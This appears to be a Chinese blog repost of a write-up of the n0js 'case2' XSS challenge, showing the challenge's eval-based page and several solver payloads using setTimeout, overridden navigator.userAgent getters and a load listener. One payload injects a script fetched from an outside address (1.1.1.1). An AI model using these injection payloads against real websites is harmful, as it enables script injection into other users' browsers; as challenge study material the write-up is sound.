侧边栏壁纸
博主头像
落叶人生博主等级

走进秋风,寻找秋天的落叶

  • 累计撰写 129023 篇文章
  • 累计创建 28 个标签
  • 累计收到 9 条评论
标签搜索

目 录CONTENT

文章目录
前端开发

记一次xss挑战

2024-04-28 星期日 / 0 评论 / 0 点赞 / 2 阅读 / 6611 字

起始一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址: http://server.n0tr00t.com/n0js/case2.html标准:

起始

一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址:       http://server.n0tr00t.com/n0js/case2.html标准:      Please execute the jscode in the iframe(name=hi): prompt location.href     Work: Chrome, Firefox

case2.html

<!DOCTYPE html><html>  <head>    <meta http-equiv="content-type" content="text/html;charset=utf-8">    <title>n0js case2</title>  </head>  <body style="margin: -10px 0px 0px 10px;">    <h1>[n0js] case2</h1>    <span>Please execute the jscode in the iframe(name=hi): prompt location.href</span><br>    <span>Work: Chrome, Firefox</span><br>    <span>Datetime: 2016-12-14</span>        <ul>            <li>Submit: evi1m0.bat[at]gmail.com</li>            <li>Casetip: dota2 pudge</li>            <li>Subject by: evi1m0 / server.n0tr00t.com</li>        </ul>        <hr>        <script>            eval(eval((window.location.search.substring(1).split("=")[1])));        </script>        <pre>            <iframe name="hi" src="//server.n0tr00t.com/n0js/case2_test.html" style="width: 400px;height: 200px;"></iframe>        </pre>  </body></html>

case2_test.html

<script>function getos() {    var sUserAgent = navigator.userAgent;    var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");    var isMac = (navigator.platform == "Mac68K") || (navigator.platform == "MacPPC") || (navigator.platform == "Macintosh") || (navigator.platform == "MacIntel");    if (isMac) return "Mac";    var isUnix = (navigator.platform == "X11") && !isWin && !isMac;    if (isUnix) return "Unix";    var isLinux = (String(navigator.platform).indexOf("Linux") > -1);    if (isLinux) return "Linux";    if (isWin) {        var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;        if (isWin2K) return "Win2000";        var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;        if (isWinXP) return "WinXP";        var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;        if (isWin2003) return "Win2003";        var isWinVista= sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;        if (isWinVista) return "WinVista";        var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;        if (isWin7) return "Win7";    }    return "other";}document.write('OS:'+getos()+'<br>UA:'+window.parent.navigator.userAgent);</script>

分析

1. case2.html中js取url地址“="后面的值传入eval执行2. 页面先加载js,后加载的iframe3. url传入的参数带单引号,双引号都会被urlencode4. case2_test.html提示userAgent或许可用5. 开搞

解决

1. url应该是case2.html?test=payload2. 使用延时执行js;修改浏览器的navigator.platform属性;绑定监听页面load事件3. url地址“#”后面的单双引号等字符不会被编码

case1: 延时加载js

解法一:case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca解法二:case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500)  // @fyth

case2: 修改浏览器属性

解法一:case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '<script>prompt(location.href)</script>';}})  //@gaoheby解法二:case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '<svg/onload=prompt(location.href)>'}) // @fyth解法三:case2.html?a=location.hash.substr(1)#var frame = document.createElement('iframe'); frame.style.display = 'none'; document.body.appendChild(frame); function navigator(){} window.navigator = new Proxy(window.frames[0].window.navigator, { get: function(n0t){return "<img src=@ onerror=alert(location.href)>";} })  // @evi1m0解法四:case2.html?a=location.hash.substr(1)#function createProperty(value){var _value=value;function _get(){return _value}function _set(v){_value=v}return{"get":_get,"set":_set}}; function makePropertyWritable(objBase,objScopeName,propName,initValue){var newProp,initObj;if(objBase&&objScopeName in objBase&&propName in objBase[objScopeName]) {if(typeof initValue==="undefined"){initValue=objBase[objScopeName][propName]}newProp=createProperty(initValue);try{Object.defineProperty(objBase[objScopeName],propName,newProp)} catch(e){initObj={};initObj[propName]=newProp;try{objBase[objScopeName]=Object.create(objBase[objScopeName],initObj)}catch(e){}}}}; makePropertyWritable(window,"navigator","userAgent"); window.navigator.userAgent="<script>prompt(location.href)</script>"; // 1124696276

case3: 绑定监听页面load属性

case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})

最后

作者测试页面:    http://server.n0tr00t.com/n0js/    上面几个解法都来自此页面,作者又放出了一个case,欢迎感兴趣的去玩耍,多学习。MDN的 JavaScript文档:     https://developer.mozilla.org/zh-CN/docs/Web/JavaScript     好好学习天天向上,thx piaca & NorthOrchid。

赞一下 返回首页
本文链接: https://www.qiuyue.org/essay/front/178408.html
广告 广告

评论区